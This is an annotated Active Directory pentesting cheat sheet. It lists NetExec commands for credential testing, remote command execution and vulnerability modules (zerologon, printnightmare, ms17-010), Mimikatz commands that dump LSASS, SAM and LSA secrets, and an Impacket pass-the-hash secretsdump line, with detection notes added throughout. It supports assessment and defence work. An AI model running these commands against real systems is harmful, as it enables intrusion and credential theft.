AD Tools
Netexec
# Protocol Enumeration
# Each line tests one credential pair against one service on $ip.
# Where -x is given, NetExec also runs the command (here `whoami`) on the
# target, so those lines test remote command execution with the account,
# not just authentication.
# Defender note: a sweep like this shows up as logons for one account from a
# single source across many services within seconds; failed attempts count
# toward the account lockout threshold.
netexec rdp $ip -u 'user' -p 'pass' -x whoami
netexec wmi $ip -u 'user' -p 'pass' -x whoami
netexec smb $ip -u 'user' -p 'pass' -x whoami
netexec ldap $ip -u 'user' -p 'pass'
netexec ftp $ip -u 'user' -p 'pass'
netexec vnc $ip -u 'user' -p 'pass'
netexec winrm $ip -u 'user' -p 'pass' -x whoami
netexec ssh $ip -u 'user' -p 'pass' -x whoami
netexec nfs $ip -u 'user' -p 'pass'
netexec mssql $ip -u 'user' -p 'pass' -x whoami
# SMB Module
# Plain authentication check with the supplied account
netexec smb $ip -u 'user' -p 'password'
# --local-auth: authenticate against the host's local accounts instead of the domain
netexec smb $ip -u 'user' -p 'password' --local-auth
# --shares: list the shares and the access the account has on each
netexec smb $ip -u 'user' -p 'password' --shares
# --rid-brute: enumerate users and groups by cycling through RIDs. This line
# uses 'guest' with an empty password, so it only returns data where guest
# access is enabled, which is itself a finding to remediate.
netexec smb $ip -u 'guest' -p '' --rid-brute
# Vulnerability scan: www.netexec.wiki/smb-protocol/scan-for-vulnerabilities
# Each -M module checks the target for one known issue. Treat a positive
# result as an indicator and confirm it against the host's patch level.
# NOTE(review): confirm in the linked documentation which modules are
# check-only before running them against production domain controllers.
netexec smb $ip -u 'user' -p 'pass' -M zerologon
netexec smb $ip -u 'user' -p 'pass' -M printnightmare
netexec smb $ip -u 'user' -p 'pass' -M nopac
netexec smb $ip -u 'user' -p 'pass' -M smbghost
netexec smb $ip -u 'user' -p 'pass' -M ms17-010
# coerce_plus looks for authentication-coercion paths rather than a single missing patch
netexec smb $ip -u 'user' -p 'pass' -M coerce_plus
Mimikatz
# Request SeDebugPrivilege for the Mimikatz process
# (the account must already hold it; local administrators do by default)
privilege::debug
# Start logging console output to a file. The log will contain every secret
# printed by the commands below, so treat it as sensitive data.
log
# Elevate to SYSTEM user privileges by impersonating a SYSTEM token
token::elevate
# Extract Passwords/Hashes from the system
# Defender note: the sekurlsa commands read LSASS process memory. LSA
# protection (RunAsPPL) and Credential Guard limit what they can recover, and
# process-access telemetry on lsass.exe (for example Sysmon Event ID 10) is
# the usual detection point.
sekurlsa::logonpasswords
lsadump::sam
sekurlsa::tickets
# wdigest yields cleartext passwords only where WDigest credential caching
# (UseLogonCredential) is enabled; it is off by default on current Windows versions
sekurlsa::wdigest
# sekurlsa : Extracts passwords, keys, pin codes, tickets from the memory of LSASS
sekurlsa::ekeys
sekurlsa::dpapi
sekurlsa::msv
sekurlsa::kerberos
# lsadump : Dump credential / secret / account data from LSA
# secrets = stored LSA secrets; cache = cached domain logon credentials
lsadump::secrets
lsadump::cache
# vault : Dump Windows Credential Vault entries
# NOTE(review): /patch appears to modify a running process in memory to read
# the entries; confirm that is acceptable on the host before using it.
vault::cred /patch
# Dumping hashes remotely
# Impacket secretsdump authenticating as 'administrator' by pass-the-hash:
# -hashes takes LMHASH:NTHASH, and the empty part before the colon means only
# the NT hash is supplied. The address and hash below are the page's sample values.
# An NT hash is password-equivalent, so keep real ones out of shell history,
# notes and reports.
# Defender note: this typically appears as an NTLM network logon (Event ID
# 4624, logon type 3) for a privileged account from an unusual source,
# followed by remote registry access on the target.
secretsdump.py administrator@192.168.194.141 -hashes :3c4495bbd678fac8c9d218be4f2bbc7b